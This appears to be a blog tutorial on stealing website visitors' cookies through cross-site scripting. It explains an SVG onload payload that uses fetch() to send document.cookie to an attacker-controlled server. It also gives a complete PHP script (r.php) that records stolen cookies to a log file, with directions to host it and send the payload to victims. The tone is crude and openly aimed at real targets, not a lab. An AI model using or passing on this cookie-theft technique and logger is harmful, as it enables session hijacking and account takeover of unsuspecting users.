How’s you doing bros? Today I am gonna show you how to steal cookies with my love, XSS. Lets go!
We will use these six things:
- Fetch API
- Our Server
- document.cookie property
- A Vulnerable Website
- A Sex Doll (Optional)
Fetch API is used to fetch resources such as webpages and document.cookie property returns the cookie from the DOM.
Step 1. Copy the following code thingy
Step 2. Most important step
Replace //attacker:port/ with your server name and port.
Step 3. Hack ’em!
Yeah, send it to your victim and check your server logs.
What the actual fuck?
- We are injecting a HTML element into the webpage i.e. SVG.
- onload is an event handler which gets triggered when element associated with it gets loaded.
- fetch() is used to make request to a webpage
- attacker:port is our server and port so it makes a request to us
- %2B is the URL encoded form of +
- cookie is as same as document.cookie which returns the cookie.
Putting it together: We are injecting a payload which makes request to our server including the cookie when loaded.
No! Who the fuck has time to check server logs and shit? Lets try plan B.
Step 1. Create Recording Mechanism
Open your text editor and paste the following code
<?php $url = $_SERVER['REQUEST_URI']; $new = str_replace('/r.php?=', '', $url); $handle = fopen('log.txt', 'w') or die('Cannot open file: '.'log.txt'); fwrite($handle, $new); ?>
and save it as r.php
Now create a blank text file with name log.txt and enter chmod +x log.txt in your terminal after navigating to it.
Step 2. That’s it
Host this file on your server and use the following payload:
Just send the payload to your victim and the cookie will be stored in log.txt.
Note: No need to include the port because you will be serving it on default HTTP port i.e. 80.
Thanks for reading. I hope you enjoyed this tutorial.
Please check other tutorials as well.
Also Read: SQL Injection Basics For Beginners